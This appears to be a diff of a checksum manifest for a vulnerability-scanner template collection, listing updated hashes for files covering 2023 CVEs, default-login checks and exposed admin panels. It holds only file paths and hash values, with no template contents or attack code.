-http/cves/2023/CVE-2023-34752.yaml:d90aa1cae81ab56b74f9ccaad2e0bc3f4981c725 -http/cves/2023/CVE-2023-34753.yaml:d4dbff42bb6cc2d7b9bf64558ffff678939a62ce -http/cves/2023/CVE-2023-34755.yaml:b4152f55625f2d4bf08d4d6cf82a1780f5b2a9a6 -http/cves/2023/CVE-2023-34756.yaml:1224ffae4cd13dad0af56dc2cf84333e476fc4de -http/cves/2023/CVE-2023-3479.yaml:e667b79d13101685cedf373734d04f7cd74e1a02 -http/cves/2023/CVE-2023-34843.yaml:95b29ace1c005889fbddc2f59f4a935f091be982 -http/cves/2023/CVE-2023-34960.yaml:8e722e45bb866e424a1e2113319f1e900b5e768e -http/cves/2023/CVE-2023-35078.yaml:a1aae08725b150a8b66c41a08187ab19e29bbfd0 -http/cves/2023/CVE-2023-35082.yaml:fa9ea37d733480a21e32410c94aa31dabe391387 -http/cves/2023/CVE-2023-35813.yaml:d4e78731d4b0c437c5706ef8e0ea8aa96e29452f -http/cves/2023/CVE-2023-35843.yaml:d4579b8142f077e432af520af5d161ef56d5f2c6 -http/cves/2023/CVE-2023-35844.yaml:ca2643e445ea759ab729ad42da6d68cdaa6a5d00 -http/cves/2023/CVE-2023-35885.yaml:db4be86f91186796611be582cef764b1c1282680 -http/cves/2023/CVE-2023-36144.yaml:970f9e49bd4ec323f386476e9ed6695207a8b2f9 -http/cves/2023/CVE-2023-36287.yaml:fb1ed62d5f62bcb36b3680c382a2b3175045442c -http/cves/2023/CVE-2023-36289.yaml:419fbb6d7f3e3732270029de091c13eeb292c03d -http/cves/2023/CVE-2023-36306.yaml:0a650fc3683baa850dd6482bb317d4b984c3ffd2 -http/cves/2023/CVE-2023-36346.yaml:0236aef5c7b23357b0ec9938b2a0c4de22efcda4 -http/cves/2023/CVE-2023-36844.yaml:1091405a3e1d5172ae3c86d55f23ff373a679f0e -http/cves/2023/CVE-2023-36845.yaml:ce1e590b9e85e68da4a13bf9b832054bd57df9c3 -http/cves/2023/CVE-2023-36934.yaml:494db0e618bc33f7d356dbc9c9c396a3ee2c710d -http/cves/2023/CVE-2023-3710.yaml:23f20952ae95dfa9352b0a338a9e31b96c9727e3 -http/cves/2023/CVE-2023-37265.yaml:58aa1e00a89abd83b90649ef99e67a7b4e858807 -http/cves/2023/CVE-2023-37266.yaml:12c3c68e0204fdb2980b4ec3fce52329507c65be -http/cves/2023/CVE-2023-37270.yaml:651b97f68376563f5c81117d57970b9968dc47bd -http/cves/2023/CVE-2023-37462.yaml:74d5d583e9afa83d37f9ff4a3ef8032519f02a71 -http/cves/2023/CVE-2023-37474.yaml:c6be181489a092c2fd1e2fa6b7d4c90017041c28 -http/cves/2023/CVE-2023-37580.yaml:7e690ae533f176803645e6db6cb0fbc6ce2a3c6f -http/cves/2023/CVE-2023-37629.yaml:1d7f1379297f8c1c8304e9496629028bf8c2f89b -http/cves/2023/CVE-2023-3765.yaml:9cbe682a88b60eb4168cefa62d666b35ddafd2a3 -http/cves/2023/CVE-2023-37679.yaml:f64dd77bace480e4a523bf6226614fd6b3eb0515 -http/cves/2023/CVE-2023-37728.yaml:48e81e4d28c668d534976808e96d39ed3430c590 -http/cves/2023/CVE-2023-37979.yaml:642f169b65d2c3d9bb8fa8b6d0ef683629b36af6 -http/cves/2023/CVE-2023-38035.yaml:e0133a345fdb72e54350b452e48a66e0208ac8a6 -http/cves/2023/CVE-2023-38205.yaml:76f86f16fe21643b91e8cfd580c8ab1766fb1a26 -http/cves/2023/CVE-2023-3836.yaml:1995a74bdab51932430eac4cb88a8f55197010ab -http/cves/2023/CVE-2023-3843.yaml:8988de7f658f97ed6aabe8fe0c6d9d86169fed8a -http/cves/2023/CVE-2023-38433.yaml:226855b931fd55e3b21380ead79df922ae00da9f -http/cves/2023/CVE-2023-3844.yaml:31a2a1ebbd90e538036aedb726ea31161c993e0e -http/cves/2023/CVE-2023-3845.yaml:1821083bc14f42c37f14e0f025a37013365c79b2 -http/cves/2023/CVE-2023-3846.yaml:47c230dc77e7d6ee37b7e65dfeb6207e421042a3 -http/cves/2023/CVE-2023-3847.yaml:cf84fd3a126d4a4f87c26f321fb316ebd99084f1 -http/cves/2023/CVE-2023-3848.yaml:3fb60f7be7688e2e23aca8a2983ca7323b5dc326 -http/cves/2023/CVE-2023-3849.yaml:6f5b07362633a220be87b22f7c2361a43c79eead -http/cves/2023/CVE-2023-38501.yaml:dfdcf3b845c256edd1928759d92d0f2eb8381604 -http/cves/2023/CVE-2023-38646.yaml:d097646365a4318ff1ff0e045facd2d04eba9cbf -http/cves/2023/CVE-2023-39002.yaml:f179dfb9ff03040780dab4f232c469c1a3e89591 -http/cves/2023/CVE-2023-39026.yaml:558cefcbdb662739fe53982991605c79f82c4711 -http/cves/2023/CVE-2023-39108.yaml:bd583eb397028f0da06b82bdbe22c229f00b3ad7 -http/cves/2023/CVE-2023-39109.yaml:6ebbc820f9b5321de48ea9c6d449811eaab1254d -http/cves/2023/CVE-2023-39110.yaml:b089bf8fe2563839e3711138e341e1fd97aecc61 +http/cves/2023/CVE-2023-34124.yaml:a6d8bc292a3296e390a68d83a7d5cb2cbf5b54a2 +http/cves/2023/CVE-2023-34192.yaml:21206e4b73abb6b1dfea7a11627746d6a91fb288 +http/cves/2023/CVE-2023-34259.yaml:7444c7ce3c0f8043e2f97c827f05e302488f67a3 +http/cves/2023/CVE-2023-34362.yaml:9f4477a523c47b40f3f567d082219279a246c5f1 +http/cves/2023/CVE-2023-34537.yaml:51a68b22a4d43f6f7bb1de064af0e214332fa57e +http/cves/2023/CVE-2023-34598.yaml:4ef8930ffa50f837ab14a65b493a7af273844371 +http/cves/2023/CVE-2023-34599.yaml:a5cf5ee7e7bb525c665924d63c76fa5c68ee9189 +http/cves/2023/CVE-2023-3460.yaml:9bf01fd0857093b705e348ea8b85a8f2d6677471 +http/cves/2023/CVE-2023-34659.yaml:93199d866e73295e804ab6caefedfc6fda002a21 +http/cves/2023/CVE-2023-34751.yaml:2567994959dc56cdcd3ca8c809c0974a9aef23cc +http/cves/2023/CVE-2023-34752.yaml:fd6f1cc1870e59d377ebcf49fc545ab984a1bae4 +http/cves/2023/CVE-2023-34753.yaml:6dce7b17d16080cef9a42b2afa9026e7edd39644 +http/cves/2023/CVE-2023-34755.yaml:18a3bb714c59a0d41165b27ec197a7d87737569b +http/cves/2023/CVE-2023-34756.yaml:57268d5cd4d0eca619d38aed497ff3fcb3243f9b +http/cves/2023/CVE-2023-3479.yaml:824ba85ec132b8f19fba806e88ba6c81ef0ba38d +http/cves/2023/CVE-2023-34843.yaml:d41bbb75ba0aa3bbf1e86482fdfc82f85ab5207c +http/cves/2023/CVE-2023-34960.yaml:15e2cf927814dc5983b58f4b4715c3115e28266a +http/cves/2023/CVE-2023-35078.yaml:8e67f27995bbb30daa64a9df6788cbf6c442e5a8 +http/cves/2023/CVE-2023-35082.yaml:788f07af3f733a4326caad782098ccee742d6a0b +http/cves/2023/CVE-2023-35813.yaml:c4242a8a91d28f993e91beaa3c6e75db60b90e76 +http/cves/2023/CVE-2023-35843.yaml:f9f6adcf48ddada711f492658e92c2500abcce76 +http/cves/2023/CVE-2023-35844.yaml:34a7a7c53ea39f52a9b94288c670a5f89bf95142 +http/cves/2023/CVE-2023-35885.yaml:13b1b74c8fb419e723a8e988ade29d1057283969 +http/cves/2023/CVE-2023-36144.yaml:8f55fdd70d7ddfd763395bd2d2f89f7ae48307fa +http/cves/2023/CVE-2023-36287.yaml:25081a850071f7bdf9651216823ef7a13eef015c +http/cves/2023/CVE-2023-36289.yaml:4aaedb8b6836e7268bee7db962fff84c94c0fda9 +http/cves/2023/CVE-2023-36306.yaml:26b3143f73e5169bb427b4c196d90c4e18e5ff61 +http/cves/2023/CVE-2023-36346.yaml:109e868ffb3b7d1cdcbbfc19d21ab5adbdf1956b +http/cves/2023/CVE-2023-36844.yaml:33c3fa3ce1797dede49602f88b04e016a23bb9b1 +http/cves/2023/CVE-2023-36845.yaml:430955e411410caa3ac5a53cd24d26632e4268f4 +http/cves/2023/CVE-2023-36934.yaml:623f5b2ff10da20a0433bcaf4cb9e341f765d85e +http/cves/2023/CVE-2023-3710.yaml:74d4d20e5defb6714d986283bc01496adeec1e38 +http/cves/2023/CVE-2023-37265.yaml:156adf0031254a632d8e23c548b9d8020335be73 +http/cves/2023/CVE-2023-37266.yaml:1ebac6ac4dfa9f0b55e7460ac2666f735a9a22fb +http/cves/2023/CVE-2023-37270.yaml:5fb27ed294ba617ada9f3d850c710892580a8477 +http/cves/2023/CVE-2023-37462.yaml:02f7a2f37d47cf0f8a42c4fa739df9b4629e7ec8 +http/cves/2023/CVE-2023-37474.yaml:c57c3fe6509d0079a1717ed5fb6b50bc90fcd979 +http/cves/2023/CVE-2023-37580.yaml:6a498f48f677bd0a3109fead172fe0b817ba8462 +http/cves/2023/CVE-2023-37629.yaml:cbc737447d0ad5c1414d9c780741ed244f86b6cb +http/cves/2023/CVE-2023-3765.yaml:f0d75473f7917db464bbc8b9cea9ad6dff3f3eb4 +http/cves/2023/CVE-2023-37679.yaml:ebb7f70260e7b764a6a49d5061aeee5da0d81daf +http/cves/2023/CVE-2023-37728.yaml:ff641900ee18eec4cc1ff8b6538286934a69b9fd +http/cves/2023/CVE-2023-37979.yaml:95c1b7b36556efcda4a9c7210b67132a2fd5c18c +http/cves/2023/CVE-2023-38035.yaml:8440148db20fc496a6b299c4355e933cfc109287 +http/cves/2023/CVE-2023-38205.yaml:1d2878865684a31cf3bd92a76b66bb5433945bbe +http/cves/2023/CVE-2023-3836.yaml:09cdf308fa85d7e440d00adc485d5c67218fd4a9 +http/cves/2023/CVE-2023-3843.yaml:6fcc2c2e4e8bf20d93681eb6f9d926ba34dc7bf4 +http/cves/2023/CVE-2023-38433.yaml:a4d4987bd768821d4797a8676b09272565e75b50 +http/cves/2023/CVE-2023-3844.yaml:6d398ac344f82d008cd59068e7aca75339d6a52c +http/cves/2023/CVE-2023-3845.yaml:06a0d0c967b103b591412ea5defa7f3660c4dea5 +http/cves/2023/CVE-2023-3846.yaml:b0cc9a187267c467f0eaacd765049d1d99de47f8 +http/cves/2023/CVE-2023-3847.yaml:b582a28da69f4903aace85b52eea5cf94949ee48 +http/cves/2023/CVE-2023-3848.yaml:32174ff0000d07210106a54f07dc439972bb6028 +http/cves/2023/CVE-2023-3849.yaml:e00c430c7195e56cba06ff30818ef88bdc7fd8e7 +http/cves/2023/CVE-2023-38501.yaml:af2187712235322c3062a44d32a1157d97f8f08b +http/cves/2023/CVE-2023-38646.yaml:eaca7c2fd0085a5ed3973dc8409d99abd2290506 +http/cves/2023/CVE-2023-39002.yaml:0cc3ea01dcf12a20470e701406de7d3d6fe2f30f +http/cves/2023/CVE-2023-39026.yaml:d8ae385987da5ca5f11c8acc54d21adc169cf90b +http/cves/2023/CVE-2023-39108.yaml:1a9669bcc81b320e8667f1fe125c42fa516d7fa9 +http/cves/2023/CVE-2023-39109.yaml:a5584ec948a5895aa623284da5a1bc0546b7a241 +http/cves/2023/CVE-2023-39110.yaml:b2f03f3f7e16a41625d7d74e65f914c1d36ec322 http/cves/2023/CVE-2023-39120.yaml:660394461980f18696f2a202e352194f79cadd01 -http/cves/2023/CVE-2023-39141.yaml:807797e1521149927fec06a4b68d0f7ff461c388 -http/cves/2023/CVE-2023-39143.yaml:2bcd341fd346f5a04d9c5e7c3b3851b565d792c8 -http/cves/2023/CVE-2023-3936.yaml:90cc64ed39701d7c2f1dbb5c72b73ff5ac46ebcf -http/cves/2023/CVE-2023-39361.yaml:af2931c8a38b6b858c8d5a64d6cc1a6b5cf80f5f -http/cves/2023/CVE-2023-39598.yaml:7e6db6c87eb98a0640a4a1aca218913b02e11189 -http/cves/2023/CVE-2023-39600.yaml:9bb12543e7bfe8d878368ab06ffac29fff4d7e61 -http/cves/2023/CVE-2023-39676.yaml:3993cd8656b47a24fc6f0d9c26b91c4ee3279ca6 -http/cves/2023/CVE-2023-39677.yaml:5f23e2784db060d76deb29ba8f1449523e9390ac -http/cves/2023/CVE-2023-39700.yaml:7e89c3315d82f7eb623021e9e3812d93361e5a32 -http/cves/2023/CVE-2023-39796.yaml:39d6d477b6dacf6388d38d92f90c1924d51ceb4b -http/cves/2023/CVE-2023-40208.yaml:7b0f0811421a369d97f6ddad747e4e34cd4de342 -http/cves/2023/CVE-2023-40779.yaml:606ab574bdb041a1a70ce822a17dad5fba2388b3 -http/cves/2023/CVE-2023-4110.yaml:be1df10ec9e0589fdcd3d72c5599b23439cefe47 -http/cves/2023/CVE-2023-41109.yaml:e38cdea33e8b097b30a7093caba3e42fac4b61f2 -http/cves/2023/CVE-2023-4111.yaml:9f9021d4f0fbc847c986e0ec53c5ed13a1a72105 -http/cves/2023/CVE-2023-4112.yaml:2a55b9ac24b30812fc788b5bac83c6540f415a8e -http/cves/2023/CVE-2023-4113.yaml:66192ea8eea88858da517ed33c4c023faa9da820 -http/cves/2023/CVE-2023-4114.yaml:49e3180ffd3ab35aeed7153fd5110009de7fecb6 -http/cves/2023/CVE-2023-4115.yaml:61544c8b6f05399952011669bcf45a00e8ba7d3d -http/cves/2023/CVE-2023-4116.yaml:d678af908df499a9c3e980d50f7dea441c1f502b -http/cves/2023/CVE-2023-41265.yaml:c05d16979c40178cf9007a5ccdf0197d13ccd190 -http/cves/2023/CVE-2023-41266.yaml:836de17c4fc69387539a8418293540f424bea728 -http/cves/2023/CVE-2023-4148.yaml:b4a62142878cd92c7c677aa0d10f2235f54be44b -http/cves/2023/CVE-2023-41538.yaml:218d593117edafe310c4e96fba39c51c234f65f6 -http/cves/2023/CVE-2023-41642.yaml:b4ffdad63aab3a5147d5b49eee605f32b9248d9b -http/cves/2023/CVE-2023-4168.yaml:e8c9190b1c143813f0107a2599443d57b267ca50 -http/cves/2023/CVE-2023-4169.yaml:baa66871383cde3b1c852cfbf1899139edadfdc7 -http/cves/2023/CVE-2023-4173.yaml:0f35deeba302f09ef04fff8675f7c2fc5310674b -http/cves/2023/CVE-2023-4174.yaml:490546890562c18f06e49bdc58178adbb8945f68 -http/cves/2023/CVE-2023-41763.yaml:5309f08e84061f05237d084a16c52c437e6c0a77 -http/cves/2023/CVE-2023-41892.yaml:b23710917e2323e438e71cd288ad75ecbe2a4c92 -http/cves/2023/CVE-2023-42343.yaml:5977d03c2300080323e25ce1a64ec9e6c116aba2 -http/cves/2023/CVE-2023-42442.yaml:2e2bc050a55e9bb5fb5f1ba499bd478baf63c814 -http/cves/2023/CVE-2023-42793.yaml:996b31479d926952afef3be9af399801d7034027 +http/cves/2023/CVE-2023-39141.yaml:32cea91e235a72523486669ab9a2598b3df6c133 +http/cves/2023/CVE-2023-39143.yaml:7f94ddb47848d9a6ec15dd3b49c7fd61bd2a1e53 +http/cves/2023/CVE-2023-3936.yaml:c7ce52ccd5a8c88629e6c97d21c226c17066815d +http/cves/2023/CVE-2023-39361.yaml:6193375e016277ac726df78b8cdcb2e7795847a6 +http/cves/2023/CVE-2023-39598.yaml:baae878c8b3049642cfce7c23c132802b8479ad9 +http/cves/2023/CVE-2023-39600.yaml:0a232f5faf1d6d500fbb65d5c1b6973a05ee01f5 +http/cves/2023/CVE-2023-39676.yaml:598305cf2ef7926d70e91dfae6d9072ce1d1945f +http/cves/2023/CVE-2023-39677.yaml:d095e62d076cb76168ed202f6d5f790589c52920 +http/cves/2023/CVE-2023-39700.yaml:fadb1d53bf926ff93f038b080af9892c7951cf43 +http/cves/2023/CVE-2023-39796.yaml:b46778948cc35c7bd7e4da6ffa2a64ccb007aee7 +http/cves/2023/CVE-2023-40208.yaml:a32aa8cbc2b05a364b17d899571471f69ca2adbf +http/cves/2023/CVE-2023-40779.yaml:d21f0bfc104baed650b291ffe43a7130531967dd +http/cves/2023/CVE-2023-4110.yaml:aa342871803294eadd1c50d24bf0489383911a00 +http/cves/2023/CVE-2023-41109.yaml:785011e9e11095963a63950e5b3f21f4f109cb51 +http/cves/2023/CVE-2023-4111.yaml:7ab6a2b6f6c868903cb5fa5b988aa86780dddefb +http/cves/2023/CVE-2023-4112.yaml:275dc8048a8c3adc2c202bd51115067a6bf1858e +http/cves/2023/CVE-2023-4113.yaml:d58edf8493304ee679e0ddfd2516ce56b0a1b36f +http/cves/2023/CVE-2023-4114.yaml:bea4f4ff9052ad4247353c62adb02e639f7de234 +http/cves/2023/CVE-2023-4115.yaml:0912a491501bd055efbf8f6c15801b43d504ba4b +http/cves/2023/CVE-2023-4116.yaml:f6fd0c61252dccf94463d9689c178dc9a5bdca86 +http/cves/2023/CVE-2023-41265.yaml:d2aa1edb26696074c64a2fbe22274050d79377e8 +http/cves/2023/CVE-2023-41266.yaml:f31f95a2635e505d8e5c3c01fd0a029001f7800c +http/cves/2023/CVE-2023-4148.yaml:12e4dfcfbd993cdc4feaee8717a251505b1a601b +http/cves/2023/CVE-2023-41538.yaml:4d330d11e01d36a3a88808be496ad7f59edc4efe +http/cves/2023/CVE-2023-41642.yaml:96f6c7bdbbc4e2022efe53f51055081f96a44ed5 +http/cves/2023/CVE-2023-4168.yaml:5e03d15112b7107137d9d770c7b6895bc2b47ae1 +http/cves/2023/CVE-2023-4169.yaml:85db9dd82385b541b0ab590c3f46a5847ccc217a +http/cves/2023/CVE-2023-4173.yaml:63042d9bb77fbbcfe8059d41c071d8ee33773e7f +http/cves/2023/CVE-2023-4174.yaml:7c86697a70e94a9038fba0b791bae2fee8f36ddc +http/cves/2023/CVE-2023-41763.yaml:6f75aa8bcf9060c68bf7e8da250d31f71fcf6b52 +http/cves/2023/CVE-2023-41892.yaml:52c0dc792ec89c50ae730264f47183bfa059efae +http/cves/2023/CVE-2023-42343.yaml:e903645f14e2e7b5df694047105066e950cf9ae1 +http/cves/2023/CVE-2023-42442.yaml:d1848520dfeea24d86be7d2a0e72399dd85990a6 +http/cves/2023/CVE-2023-42793.yaml:839c5236a38c2808a53fd4b1e09be1c6722cc4ed http/cves/2023/CVE-2023-43177.yaml:ea77350bd701f6e47c68e8276d5033cfa3b10073 -http/cves/2023/CVE-2023-43261.yaml:4adda5af675285522fc5d6908be3dcbdff86870b -http/cves/2023/CVE-2023-43325.yaml:6fdfdbe7ba5de9a30997da14745fcf15b9ec304c -http/cves/2023/CVE-2023-43326.yaml:8cf169142f438842fbc1c5acf3f7d9ffe96a65d4 -http/cves/2023/CVE-2023-43795.yaml:0e878a763b3e2926effd32533c4e8642a18e86b4 -http/cves/2023/CVE-2023-4415.yaml:156508c23391f2251fd8012516a93dee6b020387 -http/cves/2023/CVE-2023-44353.yaml:12fc23485e2d70edf588476b05953a89c4d3fb74 -http/cves/2023/CVE-2023-4451.yaml:9011e3404e10122e739921d74ceabbd7676f6d5e -http/cves/2023/CVE-2023-4547.yaml:9cb26b11a6c1f4cca2e1438e2839bde7ea87a7ea -http/cves/2023/CVE-2023-45542.yaml:90a902782d701c2efe8692e8d2098193df946371 -http/cves/2023/CVE-2023-4568.yaml:b782b4b76b34c496184cb689e0e20c41c22b4b3e -http/cves/2023/CVE-2023-45852.yaml:7a4038ad99644855dfe6f39ac7e92fd73a3d60d2 -http/cves/2023/CVE-2023-4596.yaml:bde7e510ccbbc29b43e191885a24e24f57f61e10 -http/cves/2023/CVE-2023-4634.yaml:3144a8482f9a773afe1f4e057c1aaf2c5a2179a6 +http/cves/2023/CVE-2023-43261.yaml:3b136794af2d6de9505ebbfc01cb283084aa4ee1 +http/cves/2023/CVE-2023-43325.yaml:1f56c54cb52c8b55053813e0168adf7a40183789 +http/cves/2023/CVE-2023-43326.yaml:6805b84cf43538911592e54010290a262da6c336 +http/cves/2023/CVE-2023-43795.yaml:3f44d5f025cfc48c5b1951e7fa99a7e5962d3098 +http/cves/2023/CVE-2023-4415.yaml:83daae4e5f9c06beaca4da7f54d8f07f5254395f +http/cves/2023/CVE-2023-44353.yaml:b619099c25e2ebcf420bb4cfe880555f41e2e190 +http/cves/2023/CVE-2023-4451.yaml:56d4c2bb91ce4d3cc94c9ba3e5d78ff347e3cbf3 +http/cves/2023/CVE-2023-4547.yaml:d5d436c2978c5091cce9a518c93d2d14e888217c +http/cves/2023/CVE-2023-45542.yaml:83e077276aaeacc074f29690cd33d2446f445566 +http/cves/2023/CVE-2023-4568.yaml:169074ced5f13202331466c13ab24513497b31dc +http/cves/2023/CVE-2023-45852.yaml:76e459ed52cd50f3849bda480539147146689030 +http/cves/2023/CVE-2023-4596.yaml:5966a57d0e14208bf3a07f092c73c11ed20236e7 +http/cves/2023/CVE-2023-4634.yaml:e2127f5f97fe5d855259dd4f2079b3d90296e6e0 http/cves/2023/CVE-2023-46359.yaml:8564110f7b0fd1c00e2999b8045978ebd4cb8f0b -http/cves/2023/CVE-2023-46574.yaml:9cf32a4fafc8bd52c18b00246f3b66271e9dede5 -http/cves/2023/CVE-2023-46747.yaml:6b2841039a71d5b669379deccc0c4a486a2d0375 -http/cves/2023/CVE-2023-4714.yaml:3c9e8ca7c46bd819619526ad437977226713c9f7 -http/cves/2023/CVE-2023-47246.yaml:5a472de48a5400547843cc0f0a2a647a7e96c801 -http/cves/2023/CVE-2023-49070.yaml:c4c6163af61c95881ef26c181ea126bbb14197f7 -http/cves/2023/CVE-2023-49103.yaml:84c40fe76668d9f247c1e0f307c657052945a9e9 -http/cves/2023/CVE-2023-4966.yaml:70a4b5a343da94634903f0a28ac7235d347963da -http/cves/2023/CVE-2023-4974.yaml:846639a4ee96da7ef22b4424aee8084c014d37dc -http/cves/2023/CVE-2023-5074.yaml:b00eacbc77eea0df5d550ce14372473c704284ff -http/cves/2023/CVE-2023-50917.yaml:27f1a347428831ead0be4470896cf6fe7f67b35e -http/cves/2023/CVE-2023-50968.yaml:3e81191c826fefe65c81b8e786d1302f276f866e -http/cves/2023/CVE-2023-51467.yaml:da2eaa69742ce2aa4a97f3b6729aed878c0f8c24 -http/cves/2023/CVE-2023-5244.yaml:4f58fdc9c92a29d6345c0e1091773916ef6f05f5 -http/cves/2023/CVE-2023-5360.yaml:9c226ec3a61f51f44f54f67a897644febb6f58fe -http/cves/2023/CVE-2023-5375.yaml:89c3b06c31e0f5824f0d1ad6d76c9b5e3ddef859 -http/cves/2023/CVE-2023-5556.yaml:f7981aa911b7a3fbf5065be6bf9b556d6addc2d3 -http/cves/2023/CVE-2023-6018.yaml:3d6e4d1d3f2bc2452eaca0739cb4ec0becb8f56f -http/cves/2023/CVE-2023-6020.yaml:c58ef1886577020dc7824af970c34e1c41052726 -http/cves/2023/CVE-2023-6021.yaml:4e8995b432c27997072d7b667974ceb6a634e7b7 -http/cves/2023/CVE-2023-6038.yaml:73370dcdb906b3ad54800bacf2119b8103c5ed79 -http/cves/2023/CVE-2023-6063.yaml:37e88595464e39a552595d057a014431e167c8c3 -http/cves/2023/CVE-2023-6379.yaml:7005bdf0269c634bb599e6be3de8bc565b18b860 -http/cves/2023/CVE-2023-6380.yaml:15f74e719b8448c91780cbe080fb867d34f08788 -http/cves/2023/CVE-2023-6553.yaml:9ed9fbd3c2b73e9bf9b3bc50369f7df7d25e1cc0 -http/cves/2023/CVE-2023-6623.yaml:88b7ee2c84d5e2114c51c7f960270fbe90162ca5 -http/cves/2023/CVE-2023-7028.yaml:5ac071c7dd61ccd480c39005036f4e0fadd069c4 -http/cves/2024/CVE-2024-0352.yaml:a5dc7e2fad942074c79ae2b4d7186f6598edfd05 +http/cves/2023/CVE-2023-46574.yaml:573f5f6c2bfa424e615d32e339a2125ece471253 +http/cves/2023/CVE-2023-46747.yaml:8031d208e79450ec52456a867115b4ee78ee8ff0 +http/cves/2023/CVE-2023-4714.yaml:cf3a098faa30bf7fd0d1e50e7167684b37edccb4 +http/cves/2023/CVE-2023-47246.yaml:484623f7812b3133cc41a4ad35f046aca2217efa +http/cves/2023/CVE-2023-49070.yaml:49dcb6c0d6c7ce3c827f23af2543c0e5b23ba5e5 +http/cves/2023/CVE-2023-49103.yaml:7c262d01c50fa63acfa32fe664c04eb7afa9fabd +http/cves/2023/CVE-2023-4966.yaml:7774a50b5736e2f404082ccd92ac16f83f699eac +http/cves/2023/CVE-2023-4974.yaml:787d04c983d327e9bc72d030f1b097b30a336ac0 +http/cves/2023/CVE-2023-5074.yaml:ac4bcdeb834ff76a861f910960e44e97a5ccdba4 +http/cves/2023/CVE-2023-50917.yaml:fe342e323ba0736184c1f6775d0ff0fce1533546 +http/cves/2023/CVE-2023-50968.yaml:578f79c96281095ae6658de80c3494a7c725d80c +http/cves/2023/CVE-2023-51467.yaml:e3421711b7b52105976ef4c397cbcf2cd68ea54c +http/cves/2023/CVE-2023-5244.yaml:2997f3b07c73fdf008b7b2c76bec65ed33acb085 +http/cves/2023/CVE-2023-5360.yaml:4e10acf7625ea5e7bfcb415da1610c433b93de85 +http/cves/2023/CVE-2023-5375.yaml:e448efacdc8ab2ef0b93c934bd25e1c91048a81f +http/cves/2023/CVE-2023-5556.yaml:f3e1c3bd9ba1b16756ecc833863d2c7a39c3a390 +http/cves/2023/CVE-2023-6018.yaml:cb0657b995ef7325716edc5737992f833ef73703 +http/cves/2023/CVE-2023-6020.yaml:4d5f5512a1f8f1635babc8e5757c1ca0e31fc537 +http/cves/2023/CVE-2023-6021.yaml:d841de450beafd071d3e2326d812c436ebbb5c96 +http/cves/2023/CVE-2023-6038.yaml:54d26b72be71dbbba849ad60d72bcf44354a749f +http/cves/2023/CVE-2023-6063.yaml:1b05f3bc8394825ed35d549bde002cd2f5a67557 +http/cves/2023/CVE-2023-6379.yaml:a02a4c596105b9314b4d722e7a87d3c201f4d595 +http/cves/2023/CVE-2023-6380.yaml:fd53a1cef98dcd0b3d0eabcb938127d820736d2d +http/cves/2023/CVE-2023-6553.yaml:ae8040c2677ef442e96841cdf5cfeaaceb24894b +http/cves/2023/CVE-2023-6623.yaml:3437e7d6d1318133b85dc6330c48376c9ac33c7a +http/cves/2023/CVE-2023-7028.yaml:2106269c4f0bbb73dc037da15ebbc8c47ee7ac77 +http/cves/2024/CVE-2024-0352.yaml:52b712de258e220d916ce9e47cf76e3608f7ea85 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c http/default-logins/abb/cs141-default-login.yaml:a5902dd34ba373c6f4e2cba15adbd9bf1e75e9c7 @@ -2958,7 +2958,7 @@ http/default-logins/azkaban/azkaban-default-login.yaml:fd08250d7e9178eaeb7c0d8f8 http/default-logins/batflat/batflat-default-login.yaml:983b4bc3ea5162cd92de42686894cfde4482ca8d http/default-logins/bloofoxcms-default-login.yaml:521262f1b70cf41dabf50e7022c8d6874ad6f472 http/default-logins/caimore/caimore-default-login.yaml:fa6dc9fbfefd35cbe6b0122cbe2063f51286d122 -http/default-logins/camunda/camunda-default-login.yaml:eb23be9aa53ce4c3dbfefed8390561308d257220 +http/default-logins/camunda/camunda-default-login.yaml:c327305f7ba1aa3dd23ff6ce30f0e4de37f1209c http/default-logins/chinaunicom/chinaunicom-default-login.yaml:825cceb7abec9ba21938e316e8748da23c72c82a http/default-logins/cobbler/cobbler-default-login.yaml:2994d59f748f3b084644bb25989f6ecc8ea81a2a http/default-logins/cobbler/hue-default-credential.yaml:810629da57236ea925fc51305d98564392a5b017 @@ -3436,7 +3436,7 @@ http/exposed-panels/goanywhere-mft-login.yaml:b40f3e1d869facb96d40e4233a71a4e2fd http/exposed-panels/gocd-login.yaml:afaa6762735e18cc1902088db3ca46b2b00bf607 http/exposed-panels/gocron-panel.yaml:a193236d3fac7ff70f1666b8695cb2c41616dde6 http/exposed-panels/gogs-panel.yaml:e6103f7080a1e474d8635c302a1b31af2cc2a753 -http/exposed-panels/goodjob-dashboard.yaml:35cf43714d2ef32ab2325c06f522a1da4a846bb9 +http/exposed-panels/goodjob-dashboard.yaml:1b9c0c47766ba864cc039759d1e8face9604a506 http/exposed-panels/gophish-login.yaml:0f8533a5b510c0baca7197b981062e04a367783b http/exposed-panels/gradle/gradle-cache-node-detect.yaml:294def83b2827933ebffe4afe6867ad2f92127b9 http/exposed-panels/gradle/gradle-enterprise-panel.yaml:60cbea349645c2b369a8030bc96a83ae198b0f8e @@ -3686,7 +3686,7 @@ http/exposed-panels/okiko-sfiler-portal.yaml:9d52ebdbe28640fd51df30583410ad78cd0 http/exposed-panels/okta-panel.yaml:8cc7e3f8647689d26b218acffdf47c6d842c65ff http/exposed-panels/olt-web-interface.yaml:4d2d00be097eee78d0f192e724b64e5d393972e2 http/exposed-panels/omniampx-panel.yaml:32996704c32494be8d441d54b3cfa0aed603bf38 -http/exposed-panels/onlyoffice-login-panel.yaml:50cb6798464e9bde27983dc20c10e9d8a8e7b47b +http/exposed-panels/onlyoffice-login-panel.yaml:10928bdf4807e40c81586ddb55c1156c7af3719b http/exposed-panels/open-game-panel.yaml:2d2350db4d84f47b09429fa9f455b88f21b0b6d7 http/exposed-panels/open-stack-dashboard-login.yaml:386e51378bb5f673b0c23326f0ff0d74ed2ad6ff http/exposed-panels/open-virtualization-manager-panel.yaml:b2077b4053a528471d0e80917e7949cc9bed2586 @@ -4018,7 +4018,7 @@ http/exposed-panels/vmware-vcloud-director.yaml:78dcf9ea4a470432651cfaac690c1e5f http/exposed-panels/vodafone-voxui-panel.yaml:b76b455de5610b1661d23a73f94cb2bcea6db332 http/exposed-panels/voipmonitor-panel.yaml:421436a10cf299edd691d64e0dabd8da2f26b671 http/exposed-panels/vrealize-loginsight-panel.yaml:f29cbc61466353e09b4bafef5713e16784328d8c -http/exposed-panels/vue-pacs-panel.yaml:b2fcbbb0c0fdd48ea8feafafecd8a6265cc0c031 +http/exposed-panels/vue-pacs-panel.yaml:890cb6e4283c98fe70cc3c6f933650b9b73a3261 